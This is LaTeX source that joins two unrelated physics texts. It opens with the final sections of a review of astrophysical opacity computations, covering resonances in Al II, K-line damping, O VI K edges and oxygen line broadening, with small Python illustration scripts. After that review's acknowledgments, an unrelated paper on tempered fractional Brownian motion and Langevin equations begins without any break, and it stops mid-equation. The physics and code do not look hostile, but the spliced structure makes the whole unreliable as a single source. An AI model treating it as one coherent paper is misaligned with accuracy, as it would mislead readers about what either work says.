The PEC arises when $n=n'$ wherein the $ns$ active electron does not participate in the transition. It may be seen in Figure~\ref{al2}a that the photoabsorption cross section of the Al~{\sc ii} $3s^2$ ground state is dominated by a series of $3pn's$ asymmetric window resonances without a PEC since, for $n=n'=3$, $3s3p$ is a true bound state below the ionization threshold. This is not the case for $3s4s\,^1S$, the first excited state (see Figure~\ref{al2}b), where now the $3p4s$ resonance lying just above the threshold becomes a large (two orders of magnitude over the background) PEC. A similar situation occurs in the photoabsorption cross sections of the following excited states of the series, namely $3s5s$ and $3s6s$, that are respectively dominated by the $3p5s$ and $3p6s$ PECs (see Figures~\ref{al2}c,d). It may be appreciated that the $3pns$ PEC widths are approximately constant and independent of the $n$ principal quantum number since their oscillator-strength distributions are mostly determined by the $f(3s,3p)=0.849$ oscillator strength of the Na-like Al~{\sc iii} core \cite{but84}.
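The resonance shapes discussed above are conveniently parameterized by the standard Fano profile, $\sigma=\sigma_0(q+\epsilon)^2/(1+\epsilon^2)$ with reduced energy $\epsilon=2(E-E_r)/\Gamma$: the window resonances of Figure~\ref{al2}a correspond to $q\approx 0$, whereas a PEC standing well above the background behaves like a large-$|q|$, quasi-Lorentzian peak. A minimal sketch with illustrative parameters:

```python
def fano(E, E_r, Gamma, q, sigma0=1.0):
    """Fano profile for a resonance embedded in a photoionization
    continuum: sigma = sigma0 * (q + eps)^2 / (1 + eps^2), where
    eps = 2*(E - E_r)/Gamma. q ~ 0 gives a window (dip); large |q|
    gives a quasi-symmetric peak such as a PEC."""
    eps = 2.0 * (E - E_r) / Gamma
    return sigma0 * (q + eps)**2 / (1.0 + eps**2)

# Window resonance (q = 0): the cross section dips to zero at E = E_r.
window = fano(10.0, 10.0, 0.2, q=0.0)   # -> 0.0
# Large-|q| peak, schematic of a PEC standing two orders of magnitude
# above the background sigma0 (q = 15 is a made-up value).
pec = fano(10.0, 10.0, 0.2, q=15.0)     # -> 225.0 (i.e., q**2 * sigma0)
```

Far from the resonance the profile tends back to the background $\sigma_0$, consistent with the approximately constant PEC widths set by the core oscillator strength.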
\begin{figure}[t!]
\includegraphics[width=0.70\textwidth]{fig6.eps}
\caption{\label{al2} Photoabsorption cross sections of the $3sns$ states of Al~{\sc ii} showing the $3pns$ PEC resonances for $n\geq 4$. (a) $3s^2$; (b) $3s4s$; (c) $3s5s$; (d) $3s6s$.}
\end{figure}
A further relevant point is that, to obtain the $3pns$ PECs in the photoabsorption cross sections of the $3sns$ bound-state series, it suffices to include in the close-coupling expansion of Equation~(\ref{cc}) the Na-like $3s$ and $3p$ core states; however, if the $4s$ and $4p$ states are additionally included, $4pns$ PECs will appear in the cross sections of the $3sns$ excited states for $n\geq 4$, whose resonance properties would be dominated by the Al~{\sc iii} core $f(3s,4p)=0.0142$ oscillator strength \cite{but84}. Due to the comparatively small value of the latter, such PECs will be less conspicuous, but in systems with more complicated electron structures this will not in general be the case. In conclusion, the PEC $n$~inventory directly depends on the $n_{\rm max}$ of the core-state expansion in Equation~(\ref{cc}), whose convergence unavoidably leads to large calculations.
\begin{figure}[t!]
\includegraphics[width=0.47\textwidth]{fig7.eps}
\caption{\label{kres} Total K photoabsorption cross section of the $1s^22s^22p^6\,^1S$ ground state of Fe~{\sc xvii}. (a)~Undamped cross section. (b) Damped (radiation and Auger) cross section.}
\end{figure}
\subsubsection{K Lines}
\label{klines}
K-resonance damping is another example of the dominance of spectator-electron processes, which~can be illustrated with the photoexcitation of the ground state of Fe~{\sc xvii} to a K-vacancy Rydberg state
\begin{equation}
h\nu+ 1s^22s^22p^6\longrightarrow 1s2s^22p^6np\ .
\end{equation}
This state decays via the radiative and Auger manifold
\begin{eqnarray}
\label{beta}
1s2s^22p^6np & \stackrel{{\rm K}n}{\longrightarrow} & 1s^22s^22p^6 + h\nu_n \\
\label{alpha}
& \stackrel{{\rm K}\alpha}{\longrightarrow} & 1s^22s^22p^5np+h\nu_\alpha \\
\label{part}
& \stackrel{{\rm KL}n}{\longrightarrow} &
\begin{cases}
1s^22s^22p^5 + e^- \\
1s^22s2p^6 + e^-
\end{cases} \\
\label{spec}
& \stackrel{{\rm KLL}}{\longrightarrow} &
\begin{cases}
1s^22s^22p^4np + e^- \\
1s^22s2p^5np + e^- \\
1s^22p^6np + e^-
\end{cases},
\end{eqnarray}
which has been shown to be dominated by the radiative K$\alpha$ (Equation~(\ref{alpha})) and Auger KLL (Equation~(\ref{spec})) spectator-electron channels \cite{pal02}. This damping process causes the widths of the $1s2s^22p^6np$ K resonances to be broad, symmetric, and almost independent of $n$, leading to the smearing of the K~edge as shown in Figure~\ref{kres}.
An inherent difficulty of the $R$-matrix method is that, to properly account for the damped widths of K-vacancy states such as $1s2s^22p^6np$, it requires the inclusion of the $1s^22s^22p^4np$, $1s^22s2p^5np$, and $1s^22p^6np$ core configurations of the dominant KLL channels (see Equation~(\ref{spec})) in the close-coupling expansion, which would rapidly make the representation of the high-$n$ resonances as $n\rightarrow \infty$ computationally intractable. To overcome this limitation, Auger damping is currently managed within the $R$-matrix formalism by means of an optical potential \cite{gor99}, which however requires the determination of the core Auger widths beforehand with an atomic structure code (e.g.,~AUTOSTRUCTURE). Furthermore, since K lines have such distinctive symmetric profiles, this scheme of predetermining tailored damped widths for subsequent inclusion in opacity calculations could also be easily implemented in perturbative methods.
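The effect of a nearly $n$-independent damped width on a K-vacancy Rydberg series can be sketched with a toy model: Lorentzians of fixed width $\Gamma$ at hydrogenic positions with $1/n^3$ strengths. At low $n$ the level spacing exceeds $\Gamma$ and the resonances stand out individually; near the series limit the spacing drops below $\Gamma$, the series coalesces, and the K edge is smeared as in Figure~\ref{kres}b. All parameters below are illustrative, not fitted Fe~{\sc xvii} values.

```python
import math

RY = 13.6057  # Rydberg in eV
E_EDGE, Z_EFF, GAMMA = 7700.0, 8.0, 15.0  # made-up edge, charge, and width

def level(n):
    """Hydrogenic position of the n-th K-vacancy resonance (eV)."""
    return E_EDGE - Z_EFF**2 * RY / n**2

def damped_k_series(E, n_max=25):
    """Sum of Lorentzians with the SAME damped width GAMMA for every n
    (spectator Kalpha/KLL decay dominates, so the width is nearly
    n-independent) and hydrogenic 1/n^3 strengths."""
    total = 0.0
    for n in range(1, n_max + 1):
        total += (1.0 / n**3) * (GAMMA / (2.0 * math.pi)) / (
            (E - level(n))**2 + (GAMMA / 2.0)**2)
    return total

# Low n: level spacing >> GAMMA, resonances stand out individually.
contrast_low = (damped_k_series(level(2))
                / damped_k_series(0.5 * (level(2) + level(3))))
# High n: spacing << GAMMA, the profile is essentially flat (smeared edge).
contrast_high = (damped_k_series(level(20))
                 / damped_k_series(0.5 * (level(20) + level(21))))
```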
\begin{figure}[t!]
\includegraphics[width=0.5\textwidth]{fig8.eps}
\caption{\label{kop} Monochromatic opacity of a photoionized gas with solar abundances and ionization parameter $\xi=10$, (a) estimated with damped cross sections and (b) estimated with undamped cross sections. Reproduced from Figure~3 of \cite{pal02} with permission of the $^\copyright$AAS.}
\end{figure}
Following \cite{pal02}, the estimated opacity of a photoionized gas with solar elemental abundances and ionization parameter $\xi=10$ is depicted in Figure~\ref{kop} in the photon range 7--8~keV adopting damped and undamped cross sections. A larger number of broad peaks, particularly the K$\alpha$ transition array around 7.2~keV, and smeared edges are distinctive damping features. (It must be mentioned that the resonances in Figures~\ref{kres}--\ref{kop} are not fully resolved, so in some cases their peak values may appear to be underestimated, suggesting departures from line-strength preservation.)
\subsubsection{Ionization Edges}
\label{ie}
While the K and L ionization edges are well understood in ground-state photoabsorption cross sections in the $R$-matrix formalism, those for excited states have not received comparable attention. In the same way as PECs (see Section~\ref{pec}), the K edge arises from a spectator-electron transition whose adequate representation is limited by the $n_{\rm max}$ of the core-state CI complex in the close-coupling expansion. This assertion may be illustrated using the simple Li-like O~{\sc vi} system as a study case.
Let us consider K photoabsorption of the $1s^2ns$ series of this ion; the K edge occurs as
\begin{equation}
1s^2ns + \gamma\longrightarrow 1s\,ns + e^-(kp)
\end{equation}
where the $ns$ electron remains a spectator in the transition; therefore, in a similar fashion to PECs, the~K-edge $n$-inventory would depend on the $n_{\rm max}$ of the core-state representation in the close-coupling expansion (Equation~(\ref{cc})). In Figure~\ref{edges}, the photoabsorption cross sections of these levels are plotted for $n\leq 4$ using three target representations for the He-like core:
\begin{description}
\item[Target~A]---$1s^2$, $1s2\ell$ with $\ell\leq 1$
\item[Target~B]---Target~A plus $1s3\ell'$ with $\ell' \leq 2$
\item[Target~C]---Target~B plus $1s4\ell''$ with $\ell''\leq 3$.
\end{description}
It may be seen that, when Target~A ($n_{\rm max}=2$) is implemented, a K edge appears in the photoabsorption cross section of the $1s^22s$ level but not in those of $1s^23s$ and $1s^24s$; for Target~B, where $n_{\rm max}=3$, K edges are there except in the cross section of the latter; and for Target~C with $n_{\rm max}=4$, they are all present. As shown in Figure~\ref{edges}, adequate K-edge representations for excited states are essential to obtain accurate high-energy tails in their cross sections.
\begin{figure}[h]
\includegraphics[width=0.75\textwidth]{fig9.eps}
\caption{\label{edges} K photoabsorption cross sections of the $1s^2ns$ states of O~{\sc vi}. Left column: $2s$ state. Middle~column: $3s$ state. Right column: $4s$ state. First row: computed with Target~A. Second row: computed with Target~B. Third row: computed with Target~C.}
\end{figure}
Furthermore, it may be seen in Figure~\ref{edges} that, in the photoabsorption of the $1s^2ns$ states of O~{\sc vi}, the strong K lines are also the result of spectator-electron transitions of the type
\begin{equation}
1s^2ns + \gamma\longrightarrow 1s\,ns\,np\ .
\end{equation}
That is, Target~A would be sufficient to generate the K$\alpha$ lines at photoelectron energies of $\sim$32~Ryd in the cross sections of the three states, but to obtain the broad K$\beta$ transitions at $\sim$44~Ryd in the $1s^23s$ cross section, at least Target~B is required. Target~C would then be necessary to obtain the broad K$\gamma$ lines at $\sim$47~Ryd in the $1s^24s$ cross section. This conclusion implies that, in the $R$-matrix method, satellite lines must be explicitly specified in the close-coupling expansion. These difficulties of the $R$-matrix method in obtaining adequate target representations in spectator-electron processes, particularly when involving excited states, are at the core of the controversy around the extended $R$-matrix calculation of Fe~{\sc xvii} L-shell photoabsorption \cite{nah16a, bla16, nah16b, igl17} mentioned in Section~\ref{fe_op}.
\subsection{Pressure Broadening}
To unravel the discrepancies of OP K-line Stark widths with those computed by other opacity codes, we adopt the simpler oxygen opacity as a test bed. This type of comparison has been previously carried out in \cite{bla12, col13, kri16b}. In Figure~\ref{o_ions}, pure oxygen monochromatic opacities (corrected for stimulated emission) at $T=192.91$\,eV and $N_e=10^{23}$\,cm$^{-3}$ are plotted as a function of the reduced photon energy $u=h\nu/kT$; the overall agreement of OP \cite{bad05} with OPLIB \cite{col13} and STAR \cite{kri16b} (see~upper panel) is very good except for the line wings.
\begin{figure}[t!]
\includegraphics[width=0.9\textwidth]{fig10.eps}
\caption{\label{o_ions} Oxygen monochromatic opacities (corrected for stimulated emission) as a function of the reduced photon energy $u=h\nu/kT$ in the ranges $0\leq u\leq 5.5$ (\textit{upper} panel) and $2.7\leq u\leq 4.3$ (\textit{lower}~panel). Black curve: OP \cite{bad05}. Red curve: OPLIB \cite{col13}. Blue curve: STAR \cite{kri16b}.}
\end{figure}
As listed in Table~\ref{frac}, the dominant charge states are O$^{7+}$, O$^{8+}$, and, to a lesser extent, O$^{6+}$ and O$^{5+}$. Since the Rosseland weighting function peaks at $u=3.83$, the line structure in the spectral interval $2.5\leq u\leq 4.5$ of Figure~\ref{o_ions} is of high relevance: O~{\sc vii} K$\alpha$, O~{\sc viii} Ly$\alpha$, and O~{\sc viii} Ly$\beta$ at $u\approx 2.98$, 3.39,~and 4.02, respectively. Interesting spectral features are the satellite-line arrays in the red wings of K$\alpha$ (mainly from O~{\sc vi} K$\alpha$) and Ly$\alpha$ (mainly from O~{\sc vi} K$\beta$), the latter clearly missing from the OP curve probably due to the completeness issues discussed in Section~\ref{ie}. By comparing the OP and OPLIB curves in detail (see Figure~\ref{o_ions}, lower panel), we find that the FWHMs of the K$\alpha$, Ly$\alpha$, and Ly$\beta$ lines are similar, but the OP lines have more extended wings; in contrast, the corresponding STAR lines are distinctively narrower. Therefore, at least for oxygen, the discrepant broadening of the OP K~lines seems to be due more to the red-wing corrections discussed in \cite{sea90, sea94, sea95}, amply applied to OP monochromatic opacities, than to narrower Stark widths, making the oxygen RMO in these plasma conditions somewhat larger ($\sim$15\%) than those of STAR and OPLIB (see Table~\ref{frac}).
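The quoted peak of the Rosseland weighting function at $u=3.83$ can be reproduced numerically from its standard form $w(u)\propto u^4\rme^u/(\rme^u-1)^2$; a minimal, self-contained sketch (the normalization constant is irrelevant for locating the maximum):

```python
import numpy as np
from scipy.optimize import minimize_scalar

def rosseland_weight(u):
    """Rosseland weighting function w(u) ~ u^4 e^u / (e^u - 1)^2, u = h nu / kT;
    the overall normalization is omitted since it does not affect the peak."""
    return u**4 * np.exp(u) / np.expm1(u)**2

# locate the maximum of w(u) on a bracketing interval
res = minimize_scalar(lambda u: -rosseland_weight(u), bounds=(1.0, 8.0),
                      method="bounded")
print(round(res.x, 2))  # -> 3.83
```

Setting $\rmd w/\rmd u=0$ gives the fixed-point equation $u=4\tanh(u/2)$, whose root is $u\approx3.830$, in agreement with the value used above.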
\begin{table}[h]
\caption{\label{frac} RMO and ionization fractions for a pure oxygen plasma at $T=192.91$\,eV and $N_e=10^{23}$\,cm$^{-3}$.
OP: \cite{bad05}. STAR: \cite{kri16b}. OPLIB: \cite{col13}.}
\begin{ruledtabular}
\begin{tabular}{ccccccc}
& RMO & \multicolumn{5}{c}{Ionization fraction (O$^{(8-n)+}$)}\\
\cline{3-7}
Method & (cm$^2$\,g$^{-1}$) & $n=0$ & $n=1$ & $n=2$ & $n=3$ & $n=4$ \\
\colrule
OP & 423 & 0.415 & 0.471 & 1.09 $\times 10^{-1}$ & 5.05 $\times 10^{-3}$ & 1.52 $\times 10^{-4}$ \\
STAR & 357 & 0.423 & 0.447 & 1.16 $\times 10^{-1}$ & 1.30 $\times 10^{-2}$ & 8.09 $\times 10^{-4}$ \\
OPLIB & 374 & 0.446 & 0.451 & 9.59 $\times 10^{-2}$ & 6.23 $\times 10^{-3}$ & 1.68 $\times 10^{-4}$ \\
\end{tabular}
\end{ruledtabular}
\end{table}
\section{\label{conc} Concluding Remarks}
In the present report we have reviewed the computational methods used in the earlier opacity revisions of the 1980s--1990s to produce fairly reliable Rosseland-mean and radiative-acceleration tables that have been used to model satisfactorily a variety of astronomical entities, among them the solar interior and pulsating stars. However, more recent developments, e.g., the revision of the solar photospheric abundances and the powerful techniques of helioseismology and asteroseismology, have led to a serious questioning of their accuracy.
This critical crossroads has induced extensive revisions of the opacity tables and numerical frameworks, the introduction of novel computational methods (e.g., the STA method) to replace the traditional detailed-line-accounting approaches, and laboratory experiments that simulate the plasma environment of the solar CZB. They have certainly deepened our understanding of the contributing absorption processes but have not yet definitively identified the missing opacity; in this respect, alternative experimental attempts to reproduce the larger-than-expected opacity measurements of \cite{bai15} are currently in progress \cite{qin16, ros16}.
Essential considerations of astrophysical opacity computations are accuracy and completeness in the treatment of the radiative absorption processes, both difficult to accomplish in spite of the powerful computational facilities available nowadays. As reviewed in Section~\ref{op}, it has been shown that configuration-interaction (CI) effects are noticeable in the spectrum shape in certain thermodynamic regimes for the topical cases of Cr, Fe, and Ni \cite{gil12, gil13, tur13b}, while incomplete configuration accounting leads to sizable discrepancies in others \cite{tur16a}. Rigorously satisfying both requirements with the OP $R$-matrix method for isoelectronic sequences with electron number $N>13$ implies close-coupling expansions that soon become computationally intractable and must then be tackled with simpler CI methods (e.g., AUTOSTRUCTURE) that neglect the bound--continuum coupling. Taking into account the original satisfactory agreement between OPAL and OP as discussed in Section~\ref{revop}, perturbative~methods such as the former appear to have an advantage in opacity calculations insofar as being able to manage configuration accounting more exhaustively. The introduction of powerful numerical frameworks (e.g., STA) to replace detailed line accounting reinforces this assertion. On~the other hand, as discussed in Section~\ref{bigdata}, the OP $R$-matrix approach generates as a byproduct an atomic radiative database (e.g., TOPbase) of sufficient accuracy and completeness to be useful in a wide variety of astrophysical problems.
An inherent limitation of the OP $R$-matrix method in opacity calculations is that radiative properties are calculated assuming isolated atomic targets, i.e., exempt from plasma correlation effects that, as previously pointed out \cite{roz91, cha13b, bel15, das16b}, could significantly modify the ionization potentials, excitation energies, and the bound--free and free--free absorption cross sections. In this respect, it has been recently shown \cite{kri16c} that ion--ion plasma correlations lead to $\sim$10\% and $\sim$15\% increases of the RMO in the solar CZB and in a pure iron plasma, respectively, that could be on their way to solve the solar abundance problem. Plasma interactions by means of Debye--H\"uckel and ion-sphere potentials have already been included in atomic structure CI codes such as GRASP92 and AUTOSTRUCTURE, and are currently being used to estimate the plasma effects on the atomic parameters associated with Fe K-vacancy states \cite{dep17}.
\begin{acknowledgments}
I would like to thank Carlos Iglesias (Lawrence Livermore National Laboratory), James~Colgan (Los Alamos National Laboratory), and Manuel Bautista (Western Michigan University) for reading the manuscript and for giving many useful suggestions. I am also indebted to James Colgan and Menahem Krief (Racah Institute of Physics, the Hebrew University of Jerusalem) for readily sharing their oxygen monochromatic opacity tabulations and ionization fractions. Private communications with Anil K. Pradhan (Ohio State University) and Sunny Vagnozzi (Stockholm University) are acknowledged. This work has been in part supported by NASA grant 12-APRA12-0070 through the Astrophysics Research and Analysis Program.
\end{acknowledgments}
\providecommand{\noopsort}[1]{}\providecommand{\singleletter}[1]{#1}%
Revealing the mechanism of the motion of particles in complex disordered systems is a fundamental and challenging topic \cite{Shlesinger,Hughes}. Generally, the motion is no longer Brownian because of the complex environment and/or the properties of the particles themselves. The mean squared displacement (MSD) of Brownian motion goes like $\langle(\Delta x)^2\rangle=\langle[x(t)-\langle x(t)\rangle]^2\rangle \sim t^\nu$ with $\nu=1$; for a long time $t$ if $\nu \not= 1$, it is called anomalous diffusion, being subdiffusion for $\nu <1$ and superdiffusion for $\nu > 1$ \cite{Metzler}; in particular, it is termed as localization diffusion if $\nu=0$ and ballistic diffusion if $\nu=2$. There are two types of stochastic processes to model anomalous diffusion: Gaussian processes and non-Gaussian ones; the non-Gaussian processes \cite{Drysdale,Metzler:01,Schumer:03,Bruno:00} include continuous time random walks (CTRWs), L\'evy processes, subordinated L\'evy processes, and the Gaussian ones \cite{Kou,Pipiras,Deng,Meerschaert:02,Eric} contain fractional Brownian motion (fBm), generalized Langevin equation, etc. In this paper, we mainly consider the Langevin type equation with correlated internal noise, being a Gaussian process.
The most basic Gaussian process, describing normal diffusion, is Brownian motion with its corresponding Langevin equation \cite{Coffey:04}
\begin{eqnarray}
m\frac{\rmd v}{\rmd t}=-\xi v+F(t),\nonumber
\end{eqnarray}
where $v$ is the velocity of a Brownian particle with a mass $m$, $\xi $ is a frictional constant, and the random fluctuation force $F(t)$ is white noise. For large $t$, the mean squared displacement of a Brownian particle is $\langle (\Delta x(t))^2\rangle=\langle(\int_0^t v(s)\rmd s)^2\rangle\simeq 2Dt$ with $D=\frac{k_B T}{\xi}$ being the Einstein relation, where $k_B$ is the Boltzmann constant and $T$ the absolute temperature of the environment. As the extension of Brownian motion, fractional Brownian motion (fBm) is still a Gaussian process, which can be seen as the fractional derivative (or integral) of a Brownian motion. The fBm is defined as \cite{Mandelbrot:68}
\begin{eqnarray}
B_H(t)=\frac{1}{\Gamma(1-\alpha)}\int_{-\infty}^{+\infty}[(t-s)_+^{-\alpha}-(-s)_+^{-\alpha}]B(\rmd s),\nonumber
\end{eqnarray}
where
\begin{equation*}
\label{cases}
(x)_+=\cases{x&for $x > 0$\\
0&for $x \leq 0$\\}
\end{equation*}
with $-\frac{1}{2}<\alpha<\frac{1}{2}$, and the Hurst index $H=\frac{1}{2}-\alpha$. Note that Brownian motion is recovered when $H=\frac{1}{2}$. The variance of $ B_H(t)$ is $2D_Ht^{2H}$, where $D_H=[\Gamma(1-2H)\cos(H\pi)]/(2H \pi)$.
Fractional Langevin equation \cite{Deng,Eric}, still being Gaussian process, reads
\begin{eqnarray}
m\frac{\rmd ^2x(t)}{\rmd t^2}=-\xi \int_0^t(t-\tau)^{2H-2}\frac{\rmd x}{\rmd\tau}\rmd\tau+\eta \gamma(t),\nonumber
\end{eqnarray}
where $x(t)$ is the particle displacement, $\eta=[k_BT\xi/(2D_HH(2H-1))]^{1/2}$, $\gamma(t)=\rmd B_H(t)/\rmd t$ is the fractional Gaussian noise, and $1/2<H<1$ is the Hurst parameter.
The mean squared displacement of the trajectory sample $x(t)$ for large $t$ is $\langle x^2(t)\rangle\simeq2k_BT/(\xi\Gamma(2H-1)\Gamma(3-2H))t^{2-2H}$.
Along the direction of extension of Brownian motion, the new Gaussian process, called tempered fractional Brownian motion (tfBm) \cite{Meerschaert:00}, was introduced by Meerschaert and Sabzikar with its definition
\begin{eqnarray}\label{PDF}
B_{\alpha,\lambda}(t)=\int_{-\infty}^{+\infty}[\rme^{-\lambda(t-x)_+}(t-x)_+^{-\alpha}-\rme^{-\lambda(-x)_+}(-x)_+^{-\alpha}]B(\rmd x), \end{eqnarray}
where $\lambda>0$, $\alpha<\frac{1}{2}$, and the Hurst index $H=\frac{1}{2}-\alpha$;
and its basic theory was developed with application to modeling wind speed. This paper naturally introduces the generalized Langevin equation, termed as tempered fractional Langevin equation (tfLe), with the tempered fractional noise as internal noise. We discuss the ergodicity of the tfBm, and derive the corresponding Fokker-Planck equation. The mean squared displacement (MSD) of the tfLe is carefully analyzed, displaying the transition from $t^2$ (ballistic diffusion for short time) to $t^{2-2H}$, and then to $t^2$ (again ballistic diffusion for long time). For the overdamped tfLe, its MSD transits from $t^{2-2H}$ to $t^2$ (ballistic diffusion). The properties of the correlation function of the tfLe with harmonic potential is also considered.
The outline of this paper is as follows. In Section \ref{two}, we review the tfBm, derive its Fokker-Planck equation, and discuss its ergodicity. The tfLe is introduced in Section \ref{three}, in which the underdamped case, overdamped case, and the tfLe with harmonic potential are discussed in detail. We conclude the paper with some discussions in the last section.
\section{Tempered fractional Brownian motion and tempered fractional Gaussian noise}\label{two}
\setcounter{equation}{0}
We introduce the definitions of the tfBm and the tempered fractional Gaussian noise (tfGn). The Fokker-Planck equation for tfBm is derived, and the ergodicity of the tfBm is discussed.
\subsection{Tempered fractional Brownian motion}
Tempered fractional Brownian motion is defined in (\ref{PDF}), which modifies the power law kernel in the moving average representation of a fractional Brownian motion by adding an exponential tempering \cite{Meerschaert:00}; it is generalizedly self-similar in the sense that for any $c>0$
\begin{equation} \label{self-similar}
\{ B_{\alpha,\lambda}(ct) \}_{t \in \mathbb{R}} = \{ c^{H} B_{\alpha,c\lambda}(t) \}_{t \in \mathbb{R}}
\end{equation}
in distribution and it has the covariance function
\begin{eqnarray}\label{covariance}
\textrm{Cov}[B_{\alpha,\lambda}(t),B_{\alpha,\lambda}(s)]=\frac{1}{2}\left[C_t^2|t|^{2H}+C_s^2|s|^{2H}-C_{t-s}^2|t-s|^{2H}\right]
\end{eqnarray}
for any $t,s\in\mathbb{R}$, where
\begin{eqnarray} \label{Cdelta}
C_t^2&=\int_{-\infty}^{+\infty}\left[\rme^{-\lambda|t|(1-x)_+}(1-x)_+^{-\alpha}-\rme^{-\lambda|t|(-x)_+}(-x)_+^{-\alpha}\right]^2\rmd x\\ &=\frac{2\Gamma(2H)}{(2\lambda|t|)^{2H}}-\frac{2\Gamma(H+\frac{1}{2})K_H(\lambda|t|)}{\sqrt{\pi}(2\lambda|t|)^H}\nonumber
\end{eqnarray}
for $t\neq 0$ and $C_0^2=0$, where $K_H(x)$ is the modified Bessel function of the second kind \cite{Meerschaert:00}. It is obvious that the variance of tfBm is $\langle B_{\alpha,\lambda}^2(t)\rangle=C_t^2|t|^{2H}\simeq 2\Gamma(2H)(2\lambda)^{-2H}$ as $t\rightarrow \infty$ on account of $K_H(t)\simeq\sqrt{\pi}(2t)^{-\frac{1}{2}}\rme^{-t}$, which means that tfBm exhibits localization. Moreover, $\langle B_{\alpha,\lambda}(t)\rangle=0$. Since $B_{\alpha,\lambda}(t)$ is a Gaussian process, when $t>0$, $B_{\alpha,\lambda}(t)\sim N(0,C_t^2t^{2H})$. Then it has the probability density function (PDF)
\begin{eqnarray}\label{PDB}
P(x,t)=\frac{1}{\sqrt{2\pi C_t^2t^{2H}}}\rme^{-\frac{x^2}{2C_t^2t^{2H}}}.
\end{eqnarray}
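As a numerical cross-check of (\ref{Cdelta}) and of the localization plateau $\langle B_{\alpha,\lambda}^2(t)\rangle\rightarrow 2\Gamma(2H)(2\lambda)^{-2H}$, the variance can be evaluated directly with SciPy's modified Bessel function of the second kind; a minimal sketch (not part of the original analysis):

```python
import numpy as np
from scipy.special import gamma, kv

def tfbm_var(t, H, lam):
    """Variance <B_{alpha,lambda}^2(t)> = C_t^2 t^{2H},
    using the Bessel-K closed form of C_t^2 from the text."""
    z = 2.0 * lam * t
    Ct2 = (2.0 * gamma(2.0 * H) / z**(2.0 * H)
           - 2.0 * gamma(H + 0.5) * kv(H, lam * t) / (np.sqrt(np.pi) * z**H))
    return Ct2 * t**(2.0 * H)

H, lam = 0.7, 0.1
plateau = 2.0 * gamma(2.0 * H) / (2.0 * lam)**(2.0 * H)  # localization level
for t in (1.0, 10.0, 100.0, 300.0):
    print(t, tfbm_var(t, H, lam) / plateau)  # ratio -> 1 once lambda*t >> 1
```

The variance increases monotonically toward the plateau, consistent with the exponential decay of $K_H$ for large argument.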
The Fourier transform of (\ref{PDB}) is $P(k,t)=\int_{-\infty}^{+\infty}\rme ^{\rmi kx}P(x,t)\rmd x=\rme ^{-C_t^2t^{2H}k^2/2}$; taking partial derivative w.r.t. $t$ and performing inverse Fourier transform on both sides of this equation lead to
\begin{eqnarray}\label{PDA}
\frac{\partial P(x,t)}{\partial t}=-\frac{\Gamma(H+\frac{1}{2})}{\sqrt{\pi}(2\lambda)^H}\left[Ht^{H-1}K_H(\lambda t)+t^H\dot K_H(\lambda t)\right]\frac{\partial^2P(x,t)}{\partial x^2}.
\end{eqnarray}
For large $t$, from (\ref{PDA}), we have that the PDF is asymptotically governed by
\begin{eqnarray}
\frac{\partial P(x,t)}{\partial t}=\frac{\Gamma(H+\frac{1}{2})\rme^{-\lambda t}}{(2\lambda)^{H+\frac{1}{2}}}\left[\lambda t^{H-\frac{1}{2}}-\left(H-\frac{1}{2}\right)t^{H-\frac{3}{2}}\right]\frac{\partial^2P(x,t)}{\partial x^2}.
\end{eqnarray}
The non-Markovian property is implied by the time-dependent diffusion constant: $D_{\alpha,\lambda}(t)=(2\lambda)^{-H-1/2}\Gamma(H+1/2)\rme^{-\lambda t}[\lambda t^{H-1/2}-(H-1/2)t^{H-3/2}]$.
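The coefficient of $\partial^2P/\partial x^2$ in (\ref{PDA}) is, by construction, half the time derivative of the variance $C_t^2t^{2H}$ (with $\dot K_H(\lambda t)$ read as $\rmd K_H(\lambda t)/\rmd t=\lambda K'_H(\lambda t)$); this identity can be confirmed numerically, e.g.:

```python
import numpy as np
from scipy.special import gamma, kv, kvp

H, lam = 0.7, 0.3

def var(t):
    """Variance C_t^2 t^{2H} of tfBm (Bessel-K closed form from the text)."""
    z = 2.0 * lam * t
    Ct2 = (2.0 * gamma(2.0 * H) / z**(2.0 * H)
           - 2.0 * gamma(H + 0.5) * kv(H, lam * t) / (np.sqrt(np.pi) * z**H))
    return Ct2 * t**(2.0 * H)

def D_coeff(t, H, lam):
    """Coefficient of d^2P/dx^2 in the Fokker-Planck equation:
    -Gamma(H+1/2)/(sqrt(pi)(2 lam)^H) [H t^{H-1} K_H(lam t) + lam t^H K_H'(lam t)]."""
    pref = gamma(H + 0.5) / (np.sqrt(np.pi) * (2.0 * lam)**H)
    return -pref * (H * t**(H - 1.0) * kv(H, lam * t)
                    + lam * t**H * kvp(H, lam * t))

t, dt = 2.0, 1.0e-5
fd = (var(t + dt) - var(t - dt)) / (2.0 * dt)  # numerical d<B^2>/dt
print(D_coeff(t, H, lam), 0.5 * fd)            # the two agree
```

The coefficient is positive, as required for a diffusion equation, since the variance grows monotonically.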
Next we consider the ergodicity of tfBm and the convergence speed of the variance of the time-averaged mean-squared displacement, $\bar{\delta}^2(B_{\alpha,\lambda}(t))=\int_0^{t-\Delta}[B_{\alpha,\lambda}(t'+\Delta)-B_{\alpha,\lambda}(t')]^2\rmd t'/(t-\Delta)$, where $\Delta$ is the lag time. If the average of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ equals the ensemble average of $B_{\alpha,\lambda}(t)$ and the variance of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ tends to zero when the measurement time is long, the process tfBm is ergodic \cite{Deng}; it indeed is (see (\ref{qi}) and (\ref{fang}) and their derivations presented in \ref{AppendixA}). In fact,
the variance of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ is a measure of ergodicity breaking and the ergodicity breaking parameter is defined as
\begin{eqnarray}
E_B(B_{\alpha,\lambda}(t))=\frac{\textrm{Var}[\bar{\delta}^2(B_{\alpha,\lambda}(t))]}{\langle \bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle^2}=\frac{\langle [\bar{\delta}^2(B_{\alpha,\lambda}(t))]^2\rangle-\langle \bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle^2}{\langle \bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle^2}.\nonumber
\end{eqnarray}
For tfBm, from \ref{AppendixA} the average of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ is
\begin{eqnarray}\label{qi}
\langle\bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle
=C_{\Delta}^2|\Delta|^{2H},
\end{eqnarray}
hence $\langle\bar{\delta}^2\rangle=\langle B_{\alpha,\lambda}^2\rangle$ for all times; for long times and moderate $\lambda$, the variance of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ is
\begin{eqnarray}\label{fang}
\textrm{Var}[\bar{\delta}^2(B_{\alpha,\lambda}(t))]
